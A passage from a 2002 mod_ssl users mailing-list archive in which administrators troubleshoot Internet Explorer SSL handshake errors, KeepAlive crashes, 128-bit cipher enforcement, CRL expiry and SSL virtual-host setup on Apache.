this list, but my > >> experience with this issue when first setting up our server leads me > to the > >> conclusion that using "nokeepalive" to fix IE problems is ineffectual. The > >> real, only cure, is to use a session cache. But that might just be me. > > > > I am also using a session cache, as in > > > > SSLSessionCache shm:/usr/local/apache/logs/ssl_scache(512000) > > > > but I am still getting the errors from IE. So that also seems to be rather > > ineffective. > > > > - Julian > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 19 07:58:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA12140; Sat, 19 Jan 2002 07:57:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta7.pltn13.pbi.net id HAA12100; Sat, 19 Jan 2002 07:56:34 +0100 (MET) Received: from christopher.tokpela.com ([63.200.61.35]) by mta7.pltn13.pbi.net (iPlanet Messaging Server 5.1 (built May 7 2001)) with ESMTP id <0GQ600GY5BA8RP@mta7.pltn13.pbi.net> for modssl-users@modssl.org; Fri, 18 Jan 2002 22:56:33 -0800 (PST) Date: Fri, 18 Jan 2002 22:49:54 -0800 From: Christopher Taranto Subject: Re[3]: MSIE + "The page cannot be displayed" error In-reply-to: <039801c1a048$e10dc4f0$7855adcf@Jason> X-Sender: efaqs.com/christopher@opal.he.net To: modssl-users@modssl.org Message-id: <4.3.2.7.2.20020118223852.00c46520@opal.he.net> MIME-version: 1.0 X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Content-type: text/plain; charset=us-ascii; format=flowed Content-transfer-encoding: 7BIT References: <4.3.2.7.2.20020117203440.033d3c00@130.94.22.245> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Christopher Taranto X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I'm not really sure what to do or what exactly I am expecting using s_server but here are the results from my server. ]# openssl s_server -accept 4443 -www \ -cert /usr/local/apache/conf/ssl.crt/www.cert.crt \ -key /usr/local/apache/conf/ssl.key/www.cert.key \ -state -debug Using default temp DH parameters ACCEPT it waits for input, but no matter what I enter it just hangs. I have looked through the man page but I haven't found an example of how this is used so I don't quite get it. What should I look for? >>To date, I haven't found a machine that is afflicted with the problem that I can do this with :( What's your URL? I will look at your page and see if it works with my broken MSIE browser. At 10:51 AM 1/18/02 -0700, you wrote: >Run this command line and try to connect to it. >openssl s_server -accept 4443 -www -cert pathtocert -key pathtokey -state > >1) Make sure to change "pathtocert" and "pathtokey" to the appropriate >values, and for additional debug info add -debug... >2) Try to make sure you are using the same openssl that you compiled >apache with > >It simply creates a weblike version of SSL on port 4433 WITHOUT apache >that will print some debug info to the client.... feel free >to "man s_server" to get info about the program > >At least this way, you will be able to find out if the problem is with >SSL, or if it with (mod_ssl+apache) > >PS... please let me know as I am confronted with the EXACT problem you >have, and have been for 3 years... even after a full Linux >redhat upgrade to 7.2 (complete reformat, re-install) > >To date, I haven't found a machine that is afflicted with the problem that >I can do this with :( > >----- Original Message ----- >From: "Christopher Taranto" >To: >Sent: Thursday, January 17, 2002 11:10 PM >Subject: RE: MSIE + "The page cannot be displayed" error > > > > Hi, > > > > I have been trying to fix the known MSIE browser issues in my configuration > > with some issues still occuring. > > > > I have read the FAQ, searched the archives, and implemented the solutions > > that have been documented - but I am still getting the dreaded "The page > > cannot be displayed" error when certain MSIE browsers attempt to connect to > > my site. I get the infamous log entry: > > > > [Fri Jan 18 00:55:53 2002] [error] mod_ssl: SSL handshake interrupted by > > system [Hint: Stop button pressed in browser?!] (System error follows) > > [Fri Jan 18 00:55:53 2002] [error] System: Connection reset by peer > > (errno: 104) > > > > Fortunately (for my sanity), I have one of non-working versions of the MSIE > > browsers (5.00.2614.3500) on one of the machines in my office so I can > > repeatedly create the errors. > > > > I am determined to squash this thing but I do not know where to go next. > > > > I have included the following information below: > > > > * SYSTEM INFORMATION > > * CONFIGURATION INFORMATION > > * BROWSER VERSION INFORMATION > > * CERTIFICATE STATISTICS FROM THE BROWSER > > > > Any help or further direction would be greatly appreciated! > > > > Sincerely, > > > > Christopher Taranto > > > > > > SYSTEM INFORMATION: > > =================== > > > > I am running Red Hat 6.2 on a Pentinum III using: > > > > * mod_ssl-2.8.5-1.3.22 > > * openssl-0.9.6b > > * mm-1.1.3 > > > > > > CONFIGURATION INFORMATION: > > ========================== > > > > > > > > AddType application/x-x509-ca-cert .crt > > AddType application/x-pkcs7-crl .crl > > > > SSLPassPhraseDialog builtin > > > > # I have also tried dbm but there was no difference > > SSLSessionCache > > shm:/usr/local/apache/logs/ssl_gcache_data(512000) > > SSLSessionCacheTimeout 300 > > > > SSLMutex file:logs/ssl_mutex > > > > SSLRandomSeed startup builtin > > SSLRandomSeed connect builtin > > > > SSLLog logs/ssl_engine_log > > SSLLogLevel info > > > > > > > > > > > > > > > > SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP > > > > BrowserMatch "MSIE [1-4]" nokeepalive \ > > ssl-unclean-shutdown \ > > downgrade-1.0 \ > > force-response-1.0 > > > > BrowserMatch "MSIE [5-9]" ssl-unclean-shutdown > > > > BrowserMatch "Mozilla/4..*PC)" nokeepalive \ > > downgrade-1.0 \ > > force-response-1.0 > > > > > > > > > > > > > > BROWSER VERSION INFORMATION > > =================================== > > > > MSIE 5.00.2614.3500 > > Cipher Strength: 40-bit > > > > > > CERTIFICATE STATS FROM THE BROWSER > > =================================== > > > > My certificate was generated using 1024 bits. > > > > Version: V3 > > Serial Number: 5A55 3FAD EB43 6649 7F8B 39BB 1D33 6DE1 > > Signature Algorithm: md5RSA > > Public Key: 3081 8902 8181 00BD D63A 500D 0FE0 CCA2 E7BB 804B 53DA E4CE > > 9F51 3D54 93A3 5D2E FC0E E3E2 7046 1EFF 6826 BB30 B8DC 4903 9A32 345F E769 > > 31D7 D313 6ECD 62BD 2CBE C070 AFD5 C1C8 9920 7442 5E44 2AED 7878 A566 DD3A > > 3445 0612 919A 0B74 2F6A E806 080F C7E7 9C68 7FAC 51D3 4EA9 0BC3 ABAF 27D2 > > 2C95 0A09 CD12 61B3 4DF2 0A88 1379 7552 5B1C D4CE 9F02 0301 0001 > > Basic Constraints: Subject Type=End Entity > > Path Length Constraint=None > > Key Usage: Digital Signature, Key Encipherment(A0) > > > > [1]CRL Distribution Point > > Distribution Point Name: > > Full Name: > > URL=http://crl.verisign.com/RSASecureServer.crl > > > > [1]Certificate Policy: > > PolicyIdentifier=2.16.840.1.113733.1.7.1.1 > > [1,1]Policy Qualifier Info: > > Policy Qualifier Id=1.3.6.1.5.5.7.2.1 > > Qualifier=161C 6874 7470 733A 2F2F 7777 772E 7665 7269 7369 676E > > 2E63 6F6D 2F43 5053 > > [1,2]Policy Qualifier Info: > > Policy Qualifier Id=1.3.6.1.5.5.7.2.2 > > Qualifier=3056 3015 160E 5665 7269 5369 676E 2C20 496E 632E 3003 > > 0201 011A 3D56 6572 6953 6967 6E27 7320 4350 5320 696E 636F 7270 2E20 6279 > > 2072 6566 6572 656E 6365 206C 6961 622E 206C 7464 2E20 2863 2939 3720 5665 > > 7269 5369 676E > > > > Server Authentication(1.3.6.1.5.5.7.3.1) > > Client Authentication(1.3.6.1.5.5.7.3.2) > > > > 2.16.840.1.113733.1.6.15: > > 16 09 39 32 36 30 32 32 ..926022 > > 34 32 37 427 > > > > Authority Information Access: [1]Authority Info Access > > AccessMethod=On-line Certificate Status Protocol(1.3.6.1.5.5.7.48.1) > > Alternative Name: > > URL=http://ocsp.verisign.com > > > > Thumbprint Algorithm: sha1 > > Thumbprint: CC1C DD7D BE05 C813 F119 813B 86E6 5717 5583 F981 > > > > > > > > > > > > > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 19 08:53:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id IAA13943; Sat, 19 Jan 2002 08:52:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from copper.caltel.com id IAA13939; Sat, 19 Jan 2002 08:52:01 +0100 (MET) From: nirvana@got.net Received: from lbn ([12.36.116.225]) by copper.caltel.com (Post.Office MTA v3.1.2 release (PO203-101c) ID# 0-68643U3500L350S0V35) with ESMTP id AAA9152 for ; Fri, 18 Jan 2002 23:51:51 -0800 Message-Id: <4.2.2.20020119000238.00a83d30@mail.got.net> X-Sender: lbaschy@mail.got.net (Unverified) X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Sat, 19 Jan 2002 00:08:30 -0800 To: modssl-users@modssl.org Subject: RE: mod-ssl on win32 (mod_ssl bug 569, apache crash) In-Reply-To: <001b01c1a0aa$a7fb3ff0$0340a8c0@shodan2> References: <4.2.2.20020117155858.00ad2b10@mail.got.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: nirvana@got.net X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Seems to be the known problem then. You have your workaround in your own answer. KeepAlive Off. Of course you'd only want that inside your and there actually is a recommended SetEnvIf User-Agent ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 which I'd put there instead of the general KeepAlive off. I don't know whether that still will be required with Apache 2 version of mod_ssl. While not perfect, definitely beats using IIS. - Leo At 09:32 PM 1/18/02 -0800, you wrote: >Hi all, > >1) I recompiled Openssl ( the "ms" option ) just to be sure. >2) I recompiled Apache 1.3.22 + mod_ssl 2.8.5 from scratch, no patches, >release build >3) I set KeepAlive Off in the httpd.conf > >Result: > >Havy refreshing doesn't cause an halt. > >4) I re-enabled KeepAlive On > >Heavy refreshing causes apache to crash. > >- Enrico ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 19 17:35:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA03353; Sat, 19 Jan 2002 17:34:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from VL-MS-MR004.sc1.videotron.ca id RAA03343; Sat, 19 Jan 2002 17:33:58 +0100 (MET) Received: from shodan2 ([24.200.91.45]) by VL-MS-MR004.sc1.videotron.ca (Netscape Messaging Server 4.15) with ESMTP id GQ720J05.BZ9 for ; Sat, 19 Jan 2002 11:33:55 -0500 From: "Enrico Demarin" To: Subject: RE: mod-ssl on win32 (mod_ssl bug 569, apache crash) Date: Sat, 19 Jan 2002 11:33:57 -0800 Message-ID: <000201c1a120$3cc58e90$0340a8c0@shodan2> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-reply-to: <4.2.2.20020119000238.00a83d30@mail.got.net> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Enrico Demarin" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Yes with keepalive off all the crashes disappear. I did like you said to leave Keepalive On and put KeepAlive Off only inside the SSL Virtualhost section, And no crashes as well. I don't know about just putting the User-Agent directive as I had crashes even with Mozilla. Ofcourse it's a workaround but yes, it works. - Enrico -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of nirvana@got.net Sent: January 19, 2002 12:09 AM To: modssl-users@modssl.org Subject: RE: mod-ssl on win32 (mod_ssl bug 569, apache crash) Seems to be the known problem then. You have your workaround in your own answer. KeepAlive Off. Of course you'd only want that inside your and there actually is a recommended SetEnvIf User-Agent ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 which I'd put there instead of the general KeepAlive off. I don't know whether that still will be required with Apache 2 version of mod_ssl. While not perfect, definitely beats using IIS. - Leo At 09:32 PM 1/18/02 -0800, you wrote: >Hi all, > >1) I recompiled Openssl ( the "ms" option ) just to be sure. >2) I recompiled Apache 1.3.22 + mod_ssl 2.8.5 from scratch, no patches, >release build >3) I set KeepAlive Off in the httpd.conf > >Result: > >Havy refreshing doesn't cause an halt. > >4) I re-enabled KeepAlive On > >Heavy refreshing causes apache to crash. > >- Enrico ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Jan 20 10:58:30 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA12614; Sun, 20 Jan 2002 10:57:46 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id KAA12494; Sun, 20 Jan 2002 10:55:52 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from mx0.gmx.net id OAA10210; Thu, 17 Jan 2002 14:42:06 +0100 (MET) From: hekiman@gmx.at Received: (qmail 18817 invoked by uid 0); 17 Jan 2002 13:42:02 -0000 Date: Thu, 17 Jan 2002 14:42:02 +0100 (MET) To: modssl-users@modssl.org MIME-Version: 1.0 Subject: ensure 128 bit encryption X-Priority: 3 (Normal) X-Authenticated-Sender: #0012464649@gmx.net X-Authenticated-IP: [195.248.40.88] Message-ID: <2780.1011274922@www58.gmx.net> X-Mailer: WWW-Mail 1.5 (Global Message Exchange) X-Flags: 0001 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: hekiman@gmx.at X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users hi! i want do ensure that all users have at least 128 bit encryption on all of my sites. this is necessary because of the users can bookmark a page. so i have no entry page with an cgi-script where i can read the HTTPS_SECRETKEYSIZE environment variable. i tried it with mod_rewrite, but there i also can't access HTTPS_SECRETKEYSIZE. i can't turn off weak ciphers, because then no connection is possibl. what i want is, that users with i.e. 56 bit encryption (browser) are forwarded to an error page (can be unsecure). i hope anyone can help me, thanx chris -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Jan 20 10:58:32 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA12618; Sun, 20 Jan 2002 10:57:50 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id KAA12544; Sun, 20 Jan 2002 10:56:53 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from yow.flatland.org id DAA26642; Fri, 18 Jan 2002 03:27:37 +0100 (MET) Received: (from erewhon@localhost) by yow.flatland.org (8.9.3/8.9.3) id UAA25261; Thu, 17 Jan 2002 20:27:44 -0600 Date: Thu, 17 Jan 2002 20:27:44 -0600 Message-Id: <200201180227.UAA25261@yow.flatland.org> X-Authentication-Warning: yow.flatland.org: erewhon set sender to erewhon@yow.flatland.org using -f From: "Steven \"Mr. Emacs\" Byrnes" To: modssl-users@openssl.org Subject: CRL expiration Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Steven \"Mr. Emacs\" Byrnes" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I have mod_ssl and Apache (specifically Stronghold), and I'm using certificates and CRLs. Whenever the time passes the time specified in the nextUpdate field for the CRL, Apache stops responding to requests and I get the following errors in the error log: mod_ssl: Certificate Verification: Error (12): CRL has expired I have a script in place to fetch a new CRL and restart the web server, but it's mighty inconvient for the server to just shut down when the CRL expires. (Which can happen if the CRL can't get fetched in time.) Kind of suboptimal behavior. What's the best work around? Modify the code? ssl_engine_kernel.c, I presume? Anybody have a patch to log the condition as a warning rather than just falling over? Thanks, Steven ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Jan 20 10:58:33 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA12633; Sun, 20 Jan 2002 10:57:55 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id KAA12521; Sun, 20 Jan 2002 10:56:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from mail.developersdesk.com id XAA06797; Thu, 17 Jan 2002 23:37:12 +0100 (MET) From: rwidmer@developersdesk.com Message-Id: <200201172237.XAA06797@opensource.ee.ethz.ch> Received: (qmail 19223 invoked from network); 17 Jan 2002 22:37:09 -0000 Received: from merlin.developersdesk.com (HELO mail.developersdesk.com) (207.70.41.165) by mail1.developersdesk.com with SMTP; 17 Jan 2002 22:37:09 -0000 To: modssl-users@modssl.org X-Mailer: Post Road Mailer for OS/2 (Green Edition Ver 3.0) Date: Thu, 17 Jan 2002 15:50:16 Subject: RE: apache+mod_ssl & kill -USR1 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: rwidmer@developersdesk.com X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users ** Reply to note from "Julian C. Dunn" Thu, 17 Jan 2002 11:20:53 -0500 (EST) > > On 17-Jan-2002 Roman V Moroz wrote: > > > Is there possiblity to restart Apache with mod_ssl graceful (with kill -USR1 > > httpd)? > > Yes, it's possible, but if you are adding or deleting new SSL virtual > hosts, you cannot use SIGUSR1; it needs a full restart. Actually, any change to the number, location or content of a certificate or key file requires a full restart. Non-SSL virtual hosts, and changes of apache configuration of your virtual hosts can be done with SIGUSR1. I am not sure about SSL configuration of things besides CRT/KEY files, so your should either try SIGUSR1 and make sure it works. (It usually fails by killing apache) If it doesn't shutdown and restart the server. Rick Rick Widmer Internet Marketing Specialists http://www.developersdesk.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Jan 20 10:59:34 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA12674; Sun, 20 Jan 2002 10:58:29 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id KAA12613; Sun, 20 Jan 2002 10:57:45 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from mx0.gmx.net id RAA04862; Fri, 18 Jan 2002 17:49:52 +0100 (MET) From: hekiman@gmx.at Received: (qmail 27578 invoked by uid 0); 18 Jan 2002 16:49:47 -0000 Date: Fri, 18 Jan 2002 17:49:46 +0100 (MET) To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="========GMXBoundary283461011372586" Subject: Re: ensure 128 bit encryption X-Priority: 3 (Normal) X-Authenticated-Sender: #0012464649@gmx.net X-Authenticated-IP: [212.33.60.116] Message-ID: <28346.1011372586@www21.gmx.net> X-Mailer: WWW-Mail 1.5 (Global Message Exchange) X-Flags: 0001 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: hekiman@gmx.at X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a MIME encapsulated multipart message - please use a MIME-compliant e-mail program to open it. Dies ist eine mehrteilige Nachricht im MIME-Format - bitte verwenden Sie zum Lesen ein MIME-konformes Mailprogramm. --========GMXBoundary283461011372586 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit with this option, the user gets no https connection if he has < 128 bit. but the user should get a error page. so it must be possible to establish a connection with <128 bit but redirected to the error page. > Use the following in either OR configuration > directives, > SSLRequireSSL > SSLRequire ( %{SSL_CIPHER_USEKEYSIZE} >= 128 ) > Thanks, > Rajidhar Etta > ----- Original Message ----- > From: Christian Hekerens > Date: Friday, January 18, 2002 3:50 am > Subject: ensure 128 bit encryption > > > hi! > > > > i want do ensure that all users have at least 128 bit encryption > > on all > > of > > my sites. this is necessary because of the users can bookmark a > > page. so > > i > > have no entry page with an cgi-script where i can read the > > HTTPS_SECRETKEYSIZE > > environment variable. i tried it with mod_rewrite, but there i also > > can't > > access HTTPS_SECRETKEYSIZE. > > i can't turn off weak ciphers, because then no connection is possible. > > what i > > want is, that users with i.e. 56 bit encryption (browser) are > > forwardedto > > an error page (can be unsecure). > > > > i hope anyone can help me, thanx > > > > chris > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > > -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net --========GMXBoundary283461011372586 Content-Type: text/x-vcard; name="retta.vcf"; charset=us-ascii Content-Transfer-Encoding: 7bit begin:vcard n:Etta;Rajidhar fn:Rajidhar Etta tel;cell:609.203.3697 tel;fax:(888) 979-8800 tel;home:(609) 750-0836 tel;work:(609) 951-8500 x192 org:eComServer Inc;ACB adr:;;Princeton Executive Campus, 4301, Route 1, South Suite 220,;Monmouth Junction;NJ;08852;United States of America version:2.1 email;internet:retta@ecomserver.com title:Software Engineer end:vcard --========GMXBoundary283461011372586-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 21 10:04:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA12749; Mon, 21 Jan 2002 10:03:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id KAA12731; Mon, 21 Jan 2002 10:02:36 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id KAA06964 for ; Mon, 21 Jan 2002 10:02:30 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma006956; Mon, 21 Jan 02 10:02:29 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id KAA13216 for ; Mon, 21 Jan 2002 10:02:28 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA26303 for ; Mon, 21 Jan 2002 10:02:25 +0100 (MET) Message-ID: <3C4BD921.143D9159@bourse.ch> Date: Mon, 21 Jan 2002 10:02:25 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Multiple SSL-enabled vhosts References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Joe Auty wrote: > You mean the browser takes the domain name from the browser, does a DNS > lookup, and equates this to the IP, and because the IPs are differnet in > my example, the Servername is not necessary? Yes - kind of... The browser always does a DNS lookup of the name you type in. That's how it knows which IP address to send the request to (TCP/IP only cares about IP addresses). The distinction comes in the server. If you have two different VHs on different IPs then it is easy for the server to distinguish them. You can put ServerName into these VHs if you like, but, with the IP address, apache has enough to decide which VH to use. If you wanted to have more than one name-based VH on each IP address then you'd need the ServerNames again. > What if I wanted to setup something like the following: > > > pathtocert1 > Servername joe.com > DocumentRoot /home/joe > > > > pathtocert1 > Servername auty.com > DocumentRoot /home/auty > > > Because the IP is now ambigious, I'm assuming the Servername is required > unless I used the NameVirtualHost * convention (which I haven't really > gotten working with SSL in my brief attempts)? You missed the point of a previous mail - you can't have name-based SSL VHs. It doesn't work. It's impossible. > This (the above) seems to work as expected, although when I do a apachectl > startssl I get an error message about the one taking precident over the > other... the error message doesn't seem to affect any usage, it seems to > work fine. Am I right? If not, is there a way to get around the error? It "seems to work" because you are using the same certificate for both VHs. What is happening is accidental behaviour - the server uses the certificate from the first VH to establish the SSL session. Since the session is now established, it can see the full HTTP header and so can use the "Host:" field to determine which VH to use. This setup "works" if you don't care what certificate your VHs use but since authentication is as important as encryption in SSL, it is not a general solution. If you can spare the IP addresses, the correct way to proceed is with separate IP-based SSL VHs on each IP address. For non-SSL VHs, you can put as many as you like on each IP address so long as you put NameVirtualHost and define ServerName in each one. It breaks down like this: SSL VHs - must be IP-based or Port-based (name-based doesn't work). - only one per IP/port. - if you use conventional port 443, only one per IP address. - ServerName is redundant (no harm if you use it - it is just ignored) - NameVirtualHost meaningless non-SSL VHs - Can be IP, port or name-based If name-based: - Unlimited number of name-based VHs per IP - needs NameVirtualHost - needs ServerName in each VH If you have many non-SSL VHs and one SSL VH on a particular IP, it is good idea to define the port on the NameVirtualHost directive, e.g. NameVirtualHost 192.168.1.1:80 This suppresses a warnign about mixing SSL and non-SSL. Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 21 14:47:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA27300; Mon, 21 Jan 2002 14:46:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id OAA27266; Mon, 21 Jan 2002 14:45:31 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 006064CE73D; Mon, 21 Jan 2002 14:45:30 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0LDiab56850; Mon, 21 Jan 2002 14:44:36 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id IAA08020; Mon, 21 Jan 2002 08:02:06 +0100 (MET) Date: Mon, 21 Jan 2002 08:02:06 +0100 (MET) Message-Id: <200201210702.IAA08020@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] bug (PR#661) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: amit gupta Version: 2.6.1 OS: windows nt Submission from: (NULL) (203.200.122.35) Hi all, When I try to connect to my apache(1.3.12) mod_ssl server (mod_ssl-2.6.1) using Internet Explorer 5 running on Win98/95/WinNT 4.0 I get a "page not found error", just after accepting the (test) certificate I requested created through openssl(0.9.5).once the certificate is installed, if i'll access the page three to four times it opens the page.can u help me out. thanks amit ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 21 16:03:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA00821; Mon, 21 Jan 2002 16:02:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from photon.wildfalcon.com id QAA00754; Mon, 21 Jan 2002 16:01:17 +0100 (MET) Received: (qmail 6226 invoked by uid 500); 21 Jan 2002 16:01:57 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 21 Jan 2002 16:01:57 -0000 Date: Mon, 21 Jan 2002 16:01:57 +0000 (GMT) From: Laurie Young To: Subject: Apache 2 + SSL Problems Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-1968139823-1011628917=:6086" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Laurie Young X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --8323328-1968139823-1011628917=:6086 Content-Type: TEXT/PLAIN; charset=US-ASCII Hi, I'm trying to get Apache 2 to work with SSL to set up an https server. I presume I am getting something wrong. When I try to access the site the connection times out and I get: [Mon Jan21 12:53:11 2002] [error] [client 127.0.0.1] Invalid method in request written to the log file I have attached a copy of my http.conf file -- ================================================== Laurie Robert Young laurie@wildfalcon.com | laurie@doc.ic.ac.uk www.wildfalcon.com | www.doc.ic.ac.uk/~laurie ICQ UIN #20194782 ================================================== --8323328-1968139823-1011628917=:6086 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="httpd.conf" 